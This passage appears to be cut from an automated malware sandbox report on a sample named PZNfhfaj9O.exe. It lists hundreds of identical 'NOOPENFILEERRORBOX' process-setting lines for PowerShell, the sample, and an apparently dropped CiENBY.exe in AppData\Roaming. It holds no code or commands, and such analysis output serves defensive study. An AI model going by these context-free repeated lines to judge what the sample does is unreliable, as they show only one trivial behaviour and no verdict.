                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\CiENBY.exeProcess information set: NOOPENFILEERRORBOX
